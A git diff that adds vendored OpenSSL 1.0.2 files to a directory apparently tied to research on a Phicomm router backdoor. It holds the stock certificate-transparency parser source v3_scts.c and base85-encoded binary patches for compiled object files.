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
F{{TgE*c$)<

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_scts.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_scts.c
new file mode 100644
index 0000000..9a4c3eb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_scts.c
@@ -0,0 +1,323 @@
+/* v3_scts.c */
+/*
+ * Written by Rob Stradling (rob@comodo.com) for the OpenSSL project 2014.
+ */
+/* ====================================================================
+ * Copyright (c) 2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/x509v3.h>
+#include "../ssl/ssl_locl.h"
+
+#if (defined(_WIN32) || defined(_WIN64)) && !defined(__MINGW32__)
+# define SCT_TIMESTAMP unsigned __int64
+#elif defined(__arch64__)
+# define SCT_TIMESTAMP unsigned long
+#else
+# define SCT_TIMESTAMP unsigned long long
+#endif
+
+#define n2l8(c,l)       (l =((SCT_TIMESTAMP)(*((c)++)))<<56, \
+                         l|=((SCT_TIMESTAMP)(*((c)++)))<<48, \
+                         l|=((SCT_TIMESTAMP)(*((c)++)))<<40, \
+                         l|=((SCT_TIMESTAMP)(*((c)++)))<<32, \
+                         l|=((SCT_TIMESTAMP)(*((c)++)))<<24, \
+                         l|=((SCT_TIMESTAMP)(*((c)++)))<<16, \
+                         l|=((SCT_TIMESTAMP)(*((c)++)))<< 8, \
+                         l|=((SCT_TIMESTAMP)(*((c)++))))
+
+typedef struct SCT_st {
+    /* The encoded SCT */
+    unsigned char *sct;
+    unsigned short sctlen;
+    /*
+     * Components of the SCT.  "logid", "ext" and "sig" point to addresses
+     * inside "sct".
+     */
+    unsigned char version;
+    unsigned char *logid;
+    unsigned short logidlen;
+    SCT_TIMESTAMP timestamp;
+    unsigned char *ext;
+    unsigned short extlen;
+    unsigned char hash_alg;
+    unsigned char sig_alg;
+    unsigned char *sig;
+    unsigned short siglen;
+} SCT;
+
+DECLARE_STACK_OF(SCT)
+
+static void SCT_LIST_free(STACK_OF(SCT) *a);
+static STACK_OF(SCT) *d2i_SCT_LIST(STACK_OF(SCT) **a,
+                                   const unsigned char **pp, long length);
+static int i2r_SCT_LIST(X509V3_EXT_METHOD *method, STACK_OF(SCT) *sct_list,
+                        BIO *out, int indent);
+
+const X509V3_EXT_METHOD v3_ct_scts[] = {
+    {NID_ct_precert_scts, 0, NULL,
+     0, (X509V3_EXT_FREE)SCT_LIST_free,
+     (X509V3_EXT_D2I)d2i_SCT_LIST, 0,
+     0, 0, 0, 0,
+     (X509V3_EXT_I2R)i2r_SCT_LIST, 0,
+     NULL},
+
+    {NID_ct_cert_scts, 0, NULL,
+     0, (X509V3_EXT_FREE)SCT_LIST_free,
+     (X509V3_EXT_D2I)d2i_SCT_LIST, 0,
+     0, 0, 0, 0,
+     (X509V3_EXT_I2R)i2r_SCT_LIST, 0,
+     NULL},
+};
+
+static void tls12_signature_print(BIO *out, const unsigned char hash_alg,
+                                  const unsigned char sig_alg)
+{
+    int nid = NID_undef;
+    /* RFC6962 only permits two signature algorithms */
+    if (hash_alg == TLSEXT_hash_sha256) {
+        if (sig_alg == TLSEXT_signature_rsa)
+            nid = NID_sha256WithRSAEncryption;
+        else if (sig_alg == TLSEXT_signature_ecdsa)
+            nid = NID_ecdsa_with_SHA256;
+    }
+    if (nid == NID_undef)
+        BIO_printf(out, "%02X%02X", hash_alg, sig_alg);
+    else
+        BIO_printf(out, "%s", OBJ_nid2ln(nid));
+}
+
+static void timestamp_print(BIO *out, SCT_TIMESTAMP timestamp)
+{
+    ASN1_GENERALIZEDTIME *gen;
+    char genstr[20];
+    gen = ASN1_GENERALIZEDTIME_new();
+    ASN1_GENERALIZEDTIME_adj(gen, (time_t)0,
+                             (int)(timestamp / 86400000),
+                             (timestamp % 86400000) / 1000);
+    /*
+     * Note GeneralizedTime from ASN1_GENERALIZETIME_adj is always 15
+     * characters long with a final Z. Update it with fractional seconds.
+     */
+    BIO_snprintf(genstr, sizeof(genstr), "%.14s.%03dZ",
+                 ASN1_STRING_data(gen), (unsigned int)(timestamp % 1000));
+    ASN1_GENERALIZEDTIME_set_string(gen, genstr);
+    ASN1_GENERALIZEDTIME_print(out, gen);
+    ASN1_GENERALIZEDTIME_free(gen);
+}
+
+static void SCT_free(SCT *sct)
+{
+    if (sct) {
+        if (sct->sct)
+            OPENSSL_free(sct->sct);
+        OPENSSL_free(sct);
+    }
+}
+
+static void SCT_LIST_free(STACK_OF(SCT) *a)
+{
+    sk_SCT_pop_free(a, SCT_free);
+}
+
+static STACK_OF(SCT) *d2i_SCT_LIST(STACK_OF(SCT) **a,
+                                   const unsigned char **pp, long length)
+{
+    ASN1_OCTET_STRING *oct = NULL;
+    STACK_OF(SCT) *sk = NULL;
+    SCT *sct;
+    unsigned char *p, *p2;
+    unsigned short listlen, sctlen = 0, fieldlen;
+
+    if (d2i_ASN1_OCTET_STRING(&oct, pp, length) == NULL)
+        return NULL;
+    if (oct->length < 2)
+        goto done;
+    p = oct->data;
+    n2s(p, listlen);
+    if (listlen != oct->length - 2)
+        goto done;
+
+    if ((sk = sk_SCT_new_null()) == NULL)
+        goto done;
+
+    while (listlen > 0) {
+        if (listlen < 2)
+            goto err;
+        n2s(p, sctlen);
+        listlen -= 2;
+
+        if ((sctlen < 1) || (sctlen > listlen))
+            goto err;
+        listlen -= sctlen;
+
+        sct = OPENSSL_malloc(sizeof(SCT));
+        if (!sct)
+            goto err;
+        if (!sk_SCT_push(sk, sct)) {
+            OPENSSL_free(sct);
+            goto err;
+        }
+
+        sct->sct = OPENSSL_malloc(sctlen);
+        if (!sct->sct)
+            goto err;
+        memcpy(sct->sct, p, sctlen);
+        sct->sctlen = sctlen;
+        p += sctlen;
+        p2 = sct->sct;
+
+        sct->version = *p2++;
+        if (sct->version == 0) { /* SCT v1 */
+            /*-
+             * Fixed-length header:
+             *              struct {
+             * (1 byte)       Version sct_version;
+             * (32 bytes)     LogID id;
+             * (8 bytes)      uint64 timestamp;
+             * (2 bytes + ?)  CtExtensions extensions;
+             */
+            if (sctlen < 43)
+                goto err;
+            sctlen -= 43;
+
+            sct->logid = p2;
+            sct->logidlen = 32;
+            p2 += 32;
+
+            n2l8(p2, sct->timestamp);
+
+            n2s(p2, fieldlen);
+            if (sctlen < fieldlen)
+                goto err;
+            sct->ext = p2;
+            sct->extlen = fieldlen;
+            p2 += fieldlen;
+            sctlen -= fieldlen;
+
+            /*-
+             * digitally-signed struct header:
+             * (1 byte)       Hash algorithm
+             * (1 byte)       Signature algorithm
+             * (2 bytes + ?)  Signature
+             */
+            if (sctlen < 4)
+                goto err;
+            sctlen -= 4;
+
+            sct->hash_alg = *p2++;
+            sct->sig_alg = *p2++;
+            n2s(p2, fieldlen);
+            if (sctlen != fieldlen)
+                goto err;
+            sct->sig = p2;
+            sct->siglen = fieldlen;
+        }
+    }
+
+ done:
+    ASN1_OCTET_STRING_free(oct);
+    return sk;
+
+ err:
+    SCT_LIST_free(sk);
+    sk = NULL;
+    goto done;
+}
+
+static int i2r_SCT_LIST(X509V3_EXT_METHOD *method, STACK_OF(SCT) *sct_list,
+                        BIO *out, int indent)
+{
+    SCT *sct;
+    int i;
+
+    for (i = 0; i < sk_SCT_num(sct_list);) {
+        sct = sk_SCT_value(sct_list, i);
+
+        BIO_printf(out, "%*sSigned Certificate Timestamp:", indent, "");
+        BIO_printf(out, "\n%*sVersion   : ", indent + 4, "");
+
+        if (sct->version == 0) { /* SCT v1 */
+            BIO_printf(out, "v1(0)");
+
+            BIO_printf(out, "\n%*sLog ID    : ", indent + 4, "");
+            BIO_hex_string(out, indent + 16, 16, sct->logid, sct->logidlen);
+
+            BIO_printf(out, "\n%*sTimestamp : ", indent + 4, "");
+            timestamp_print(out, sct->timestamp);
+
+            BIO_printf(out, "\n%*sExtensions: ", indent + 4, "");
+            if (sct->extlen == 0)
+                BIO_printf(out, "none");
+            else
+                BIO_hex_string(out, indent + 16, 16, sct->ext, sct->extlen);
+
+            BIO_printf(out, "\n%*sSignature : ", indent + 4, "");
+            tls12_signature_print(out, sct->hash_alg, sct->sig_alg);
+            BIO_printf(out, "\n%*s            ", indent + 4, "");
+            BIO_hex_string(out, indent + 16, 16, sct->sig, sct->siglen);
+        } else {                /* Unknown version */
+
+            BIO_printf(out, "unknown\n%*s", indent + 16, "");
+            BIO_hex_string(out, indent + 16, 16, sct->sct, sct->sctlen);
+        }
+
+        if (++i < sk_SCT_num(sct_list))
+            BIO_printf(out, "\n");
+    }
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_scts.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_scts.o
new file mode 100644
index 0000000000000000000000000000000000000000..e64172b839a7caed08cffa62bb915e0558cf7256
GIT binary patch
literal 6904
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_skey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_skey.c
new file mode 100644
index 0000000..1cede04
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_skey.c
